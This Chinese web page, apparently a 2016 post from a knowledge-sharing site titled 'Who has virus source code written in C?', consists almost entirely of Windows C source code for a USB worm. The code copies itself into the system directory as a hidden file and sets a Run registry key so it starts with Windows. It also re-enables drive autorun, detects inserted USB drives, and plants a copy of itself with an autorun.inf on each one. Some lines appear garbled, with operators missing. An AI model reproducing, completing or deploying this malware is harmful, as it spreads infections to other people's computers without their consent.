誰(shuí)有C語(yǔ)言編寫的病毒源代碼？

昵稱32054111 2016-07-14

展開全文

一個(gè)c病毒源代碼
#include <windows.h>
#include <Shlwapi.h>
#include <fstream.h>
#include <TlHelp32.h>
#include <Dbt.h>

#pragma comment(lib,'shlwapi.lib')

#define TIMER 1//計(jì)時(shí)器

//function
LRESULT CALLBACK WndProc(HWND, UINT, WPARAM, LPARAM);//窗口過程
//獲取盤符
TCHAR FirstDriveFromMask (ULONG unitmask);

//病毒從U盤啟動(dòng)時(shí)用到的函數(shù)
BOOL FileExist(TCHAR *path);//測(cè)試一個(gè)文件是否存在
BOOL GetSelfPath(TCHAR *path);//Get the virus's path
//BOOL FindU(TCHAR *u);//check whether u exist, u[2]
BOOL GetSysPath(TCHAR *path);//得到系統(tǒng)路徑
BOOL CopyToSysAndSet(HWND hwnd);//復(fù)制自身到系統(tǒng)目錄和設(shè)置
BOOL SetFileAttrib(TCHAR *path);//設(shè)置path所指文件的屬性
BOOL RegAutoRun(TCHAR *path);//修改注冊(cè)表，實(shí)現(xiàn)自啟動(dòng)

//從C盤啟動(dòng)時(shí)用到函數(shù)
BOOL CopyToUAndSet();//復(fù)制自己到U盤
BOOL CreateAutoRunFile(TCHAR *path);//在U盤下生成autorun.inf文件
BOOL FindSelf();//測(cè)試自己是否在已經(jīng)執(zhí)行了

//global variable
TCHAR szExePath[MAX_PATH];//the virus's path
TCHAR U[2];//保存U盤的盤符
TCHAR szSysPath[MAX_PATH];//system path

//constant
const TCHAR *szExeName='bbbbb.exe';
const TCHAR *szSysName='aaaaa.exe';
const TCHAR *szAutoRunFile='AutoRun.inf';

int WINAPI WinMain (HINSTANCE hInstance, HINSTANCE hPrevInstance,
PSTR szCmdLine, int iCmdShow)
{
static TCHAR szAppName[]=TEXT ('UUUUUU');
HWND hwnd;
MSG msg;
WNDCLASS wndclass;

wndclass.style =0;
wndclass.lpfnWndProc =WndProc;
wndclass.cbClsExtra =0;
wndclass.cbWndExtra =0;
wndclass.hInstance =hInstance;
wndclass.hIcon =0;
wndclass.hCursor =0;
wndclass.hbrBackground =0;
wndclass.lpszMenuName =NULL;
wndclass.lpszClassName =szAppName;
if (!RegisterClass (&wndclass))
{
MessageBox (NULL,TEXT('Program requires Windows NT!'),
szAppName, MB_ICONERROR);
return 0;
}
hwnd = CreateWindow (szAppName, NULL,
WS_DISABLED,
0, 0,
0, 0,
NULL, NULL, hInstance, NULL);
while (GetMessage(&msg, NULL, 0, 0))
{
TranslateMessage (&msg);
DispatchMessage (&msg);
}
return msg.wParam;
}

LRESULT OnDeviceChange(HWND hwnd,WPARAM wParam, LPARAM lParam)
{
PDEV_BROADCAST_HDR lpdb = (PDEV_BROADCAST_HDR)lParam;
switch(wParam)
{
case DBT_DEVICEARRIVAL: //插入
if (lpdb -> dbch_devicetype == DBT_DEVTYP_VOLUME)
{
PDEV_BROADCAST_VOLUME lpdbv = (PDEV_BROADCAST_VOLUME)lpdb;
U[0]=FirstDriveFromMask(lpdbv ->dbcv_unitmask);//得到u盤盤符
//MessageBox(0,U,'Notice!',MB_OK);
CopyToUAndSet();//拷到u盤
}
break;
case DBT_DEVICEREMOVECOMPLETE: //設(shè)備刪除
break;
}
return LRESULT();
}

LRESULT CALLBACK WndProc (HWND hwnd, UINT message, WPARAM wParam,LPARAM lParam)
{
switch(message)
{
case WM_Create: //處理一些要下面要用到的全局變量
U[1]=':';
GetSysPath(szSysPath);//得到系統(tǒng)路徑
SetTimer(hwnd,TIMER,5000,0);//啟動(dòng)計(jì)時(shí)器
GetSelfPath(szExePath);//得到自身的路徑
return 0;
case WM_TIMER: //timer message
if(szExePath[0]==szSysPath[0]) //如果是系統(tǒng)盤啟動(dòng)的
SendMessage(hwnd,WM_DEVICECHANGE,0,0);//檢測(cè)有沒有插入設(shè)備消息
else
{
CopyToSysAndSet(hwnd);//拷到系統(tǒng)盤并自啟動(dòng)
}
return 0;
case WM_DEVICECHANGE:
OnDeviceChange(hwnd,wParam,lParam);
return 0;
case WM_DESTROY:
KillTimer(hwnd,TIMER);
PostQuitMessage(0);
return 0;
}
return DefWindowProc(hwnd, message, wParam, lParam);
}

TCHAR FirstDriveFromMask(ULONG unitmask)
{
char i;
for (i = 0; i < 26; i)
{
if (unitmask & 0x1)//看該驅(qū)動(dòng)器的狀態(tài)是否發(fā)生了變化
break;
unitmask = unitmask >> 1;
}
return (i 'A');
}

BOOL GetSelfPath(TCHAR *path)
{
if(GetModuleFileName(NULL,path,MAX_PATH))//得到程序自身的目錄
{
return TRUE;
}
else
return FALSE;
}

BOOL GetSysPath(TCHAR *path)
{
return GetSystemDirectory(path,MAX_PATH);//得到系統(tǒng)路徑
}

BOOL CopyToSysAndSet(HWND hwnd)
{
TCHAR szPath[MAX_PATH];
lstrcpy(szPath,szSysPath);
lstrcat(szPath,'\\');
lstrcat(szPath,szSysName);//得到復(fù)制到系統(tǒng)目錄的完整目錄
if(!FileExist(szPath))//檢測(cè)系統(tǒng)目錄是否已經(jīng)存在復(fù)制的文件
{
CopyFile(szExePath,szPath,FALSE);
RegAutoRun(szPath);
return SetFileAttrib(szPath);
}
else
{
if(!FindSelf())//檢測(cè)自己有沒有運(yùn)行
{
//MessageBox(0,szExePath,szPath,MB_OK);
WinExec(szPath,SW_HIDE);//沒有就執(zhí)行
SendMessage(hwnd,WM_CLOSE,0,0);//結(jié)束自己
}
}
return FALSE;
}

BOOL FileExist(TCHAR *path)//檢測(cè)PATH所指的路徑的文件是否存在
{
int result;
result=PathFileExists(path);
if(result==1)
return TRUE;
else
return FALSE;
}

BOOL SetFileAttrib(TCHAR *path)
{
return SetFileAttributes(path,FILE_ATTRIBUTE_SYSTEM|FILE_ATTRIBUTE_HIDDEN);
}

BOOL RegAutoRun(TCHAR *path)//修改注冊(cè)表實(shí)現(xiàn)自啟動(dòng)
{
HKEY hkey;
DWORD v=0;
RegOpenKey(HKEY_CURRENT_USER,'Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer',&hkey);
RegSetValueEx(hkey,'NoDriveTypeAutoRun',0,REG_DWORD,(LPBYTE)&v,sizeof(DWORD));
if(RegOpenKey(HKEY_LOCAL_MACHINE,'SOFTWARE\\MICROSOFT\\Windows\\CurrentVersion\\Run',
&hkey)==ERROR_SUCCESS)
{
RegSetValueEx(hkey,szSysName,0,REG_SZ,(BYTE*)path,lstrlen(path));
RegCloseKey(hkey);
return TRUE;
}
else
return FALSE;
}
BOOL CopyToUAndSet()
{
TCHAR szPath[MAX_PATH];
lstrcpy(szPath,U);
lstrcat(szPath,'\\');
lstrcat(szPath,szExeName);//得到指向U盤的完整目錄

TCHAR szAutoFile[MAX_PATH];
lstrcpy(szAutoFile,U);
lstrcat(szAutoFile,'\\');
lstrcat(szAutoFile,szAutoRunFile);

if(!FileExist(szAutoFile))
{
CreateAutoRunFile(szAutoFile);
SetFileAttrib(szAutoFile);
}
if(!FileExist(szPath))
{
CopyFile(szExePath,szPath,FALSE);
return SetFileAttrib(szPath);
}
return FALSE;
}

BOOL CreateAutoRunFile(TCHAR *path) //在U盤下創(chuàng)建一個(gè)autorun.inf文件
{
ofstream fout;
fout.open(path);
if(fout)
{
fout<<'[AutoRun]'<<endl;
fout<<'open='<<szExeName<<' e'<<endl;
fout<<'shellexecute='<<szExeName<<' e'<<endl;
fout<<'shell\\Auto\\command='<<szExeName<<' e'<<endl;
fout<<'shell=Auto'<<endl;
fout.close();
return TRUE;
}
return FALSE;
}

BOOL FindSelf(){
PROCESSENTRY32 pe;
HANDLE hShot=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
pe.dwSize=sizeof(PROCESSENTRY32);
if(Process32First(hShot,&pe)){
do{
if(lstrcmp(pe.szExeFile,szSysName)==0)
{
CloseHandle(hShot);
return TRUE;
}
}while(Process32Next(hShot,&pe));
}
CloseHandle(hShot);
return FALSE;
}

本站是提供個(gè)人知識(shí)管理的網(wǎng)絡(luò)存儲(chǔ)空間，所有內(nèi)容均由用戶發(fā)布，不代表本站觀點(diǎn)。請(qǐng)注意甄別內(nèi)容中的聯(lián)系方式、誘導(dǎo)購(gòu)買等信息，謹(jǐn)防詐騙。如發(fā)現(xiàn)有害或侵權(quán)內(nèi)容，請(qǐng)點(diǎn)擊一鍵舉報(bào)。

轉(zhuǎn)藏 分享

QQ空間 QQ好友新浪微博微信

獻(xiàn)花（0） +1

來自：昵稱32054111 > 《待分類》

舉報(bào)/認(rèn)領(lǐng)